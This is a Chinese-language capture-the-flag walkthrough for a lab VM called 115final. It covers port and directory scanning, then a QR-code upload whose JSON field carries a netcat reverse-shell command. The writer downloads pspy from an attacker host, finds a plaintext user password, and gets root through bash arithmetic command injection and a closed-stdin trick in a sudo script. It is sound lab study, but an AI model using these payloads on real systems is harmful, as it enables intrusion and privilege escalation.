MazeSec-115final

115final

信息搜集

192.168.100.15

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.15                                                                     [20:03:10]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.15:22
Open 192.168.100.15:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 20:03 CST
Initiating ARP Ping Scan at 20:03
Scanning 192.168.100.15 [1 port]
Completed ARP Ping Scan at 20:03, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:03
Completed Parallel DNS resolution of 1 host. at 20:03, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 20:03
Scanning 192.168.100.15 [2 ports]
Discovered open port 80/tcp on 192.168.100.15
Discovered open port 22/tcp on 192.168.100.15
Completed SYN Stealth Scan at 20:03, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.15
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-21 20:03:26 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:FB:37:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.63 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

‍

80/tcp扫描

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.15                                                             [20:03:50]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.15/_26-01-21_20-03-56.txt

Target: http://192.168.100.15/

[20:03:56] Starting:
[20:03:57] 403 -  279B  - /.ht_wsr.txt
[20:03:57] 403 -  279B  - /.htaccess.bak1
[20:03:57] 403 -  279B  - /.htaccess.sample
[20:03:57] 403 -  279B  - /.htaccess_extra
[20:03:57] 403 -  279B  - /.htaccess.orig
[20:03:57] 403 -  279B  - /.htaccess.save
[20:03:57] 403 -  279B  - /.htaccess_orig
[20:03:57] 403 -  279B  - /.htaccessOLD
[20:03:57] 403 -  279B  - /.htaccessBAK
[20:03:57] 403 -  279B  - /.htaccess_sc
[20:03:57] 403 -  279B  - /.htaccessOLD2
[20:03:57] 403 -  279B  - /.htm
[20:03:57] 403 -  279B  - /.html
[20:03:57] 403 -  279B  - /.httr-oauth
[20:03:57] 403 -  279B  - /.htpasswds
[20:03:57] 403 -  279B  - /.htpasswd_test
[20:03:57] 403 -  279B  - /.php
[20:04:07] 403 -  279B  - /server-status
[20:04:07] 403 -  279B  - /server-status/
[20:04:09] 301 -  318B  - /uploads  ->  http://192.168.100.15/uploads/
[20:04:09] 200 -  407B  - /uploads/

‍

主页是一个QR Code的文件上传，格式要是json的。经过测试发现RCE漏洞

使用qrencode生成反弹shell二维码

qrencode -o rev.png '{"username": "$(busybox nc 192.168.100.31 7777 -e /bin/bash)"}'

‍

提权

www -> suraxddq

dpkg -V

可以发现ps被改动过

查看发现直接就是输出固定格式了

上传pspy

cd /tmp/
busybox wget http://192.168.100.18:9999/pspy64
chmod +x pspy64
./pspy64

得到凭证

suraxddq:YqsS2MVr2Gvd13LLILdL

suraxddq -> root

suraxddq@115final:/tmp$ sudo -l
Matching Defaults entries for suraxddq on 115final:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User suraxddq may run the following commands on 115final:
    (ALL) NOPASSWD: /opt/review.sh

sudo提权

#!/bin/bash


echo "Just Type something."
read Never_Show < /root/root.txt
read Never_Show
echo "$Never_Show"

# review for memory LingMj
# add a Human test

a=$RANDOM$RANDOM$RANDOM
echo "Human Test Number: $a"
read -p "Please Input Number: " b
if [ $((b-a)) != 0 ];then
        exit 1;
fi

flag=$(echo $RANDOM$RANDOM$RAMDOM$RANDOM | md5sum | awk '{print $1}')

[[ "$1" == "user"  ]] && echo "flag{fakeuser-$flag}"
[[ "$1" == "root"  ]] && echo "flag{fakeroot-$flag}"
[[ -z "$1"  ]] && echo "flag{fakefake-$flag}"

‍

方案一

在 Bash 脚本中，$((expression))​ 用于数学运算。它的一个关键特性是：它会对括号内的变量进行“双重求值”或递归解析。

if [ $((b-a)) != 0 ]; then

• 正常情况​：如果变量 b​ 是 5​，a​ 是 3​，Bash 计算 5-3=2。
• 漏洞情况​：如果变量 b​ 的内容不是数字，而是一个​字符串​，Bash 会尝试将这个字符串当作一个变量名或表达式再次解析。
• 命令替换​：如果在解析过程中发现了 $(command)​ 或 `command`​，Bash 会为了获取计算数值而​先执行该命令。

Payload 构造

要输入给变量 b​ 的内容​a[$(/bin/bash >&2)]​

• ​a​​：这是脚本中已经存在的一个变量名（由 $RANDOM​ 生成）。在算术运算中，写 a[...]​ 会被 Bash 理解为访问名为 a​ 的​数组。

• ​[...]​ ：为了确定数组的下标（Index），Bash 必须计算方括号内部的内容。

• ​$(/bin/bash ...)​ ​：这是​命令替换​。Bash 会在计算下标之前，优先启动一个新的子进程运行 /bin/bash。

• ​>&2​：

• 在 $(( )) 内部运行命令时，默认的标准输出（stdout）会被 Bash 拦截（因为它期望命令返回一个数字用于计算）。

• >&2​ 表示将标准输出重定向到标准错误（stderr） 。

suraxddq@115final:/tmp$ sudo /opt/review.sh
Just Type something.


Human Test Number: 235185078105
Please Input Number: a[$(/bin/bash >&2)]
root@115final:/tmp# whoami
root
root@115final:/tmp#

或者

suraxddq@115final:/tmp$ sudo /opt/review.sh
Just Type something.


Human Test Number: 92111853617531
Please Input Number: a[`/bin/bash >&2`]
root@115final:/tmp# whoami
root
root@115final:/tmp#

‍

方案二

sudo /opt/review.sh <&-

这里会将root.txt读取到Never_Show变量中

变量 Never_Show​ 此时保存了真正的 Root Flag。

而read Never_Show从stdin中读取内容覆盖Never_Show

那么如果将stdin关闭，那么read​ 命令尝试访问它时报错。因为读取失败，原本变量里的 Flag 没有被覆盖

echo "Just Type something."
read Never_Show < /root/root.txt
read Never_Show
echo "$Never_Show"

suraxddq@115final:/opt$ sudo /opt/review.sh <&-
Just Type something.
/opt/review.sh: line 6: read: read error: 0: Bad file descriptor
flag{root-572867788d8a1a040d74bda364121406}
Human Test Number: 20444197425835
/opt/review.sh: line 14: read: read error: 0: Bad file descriptor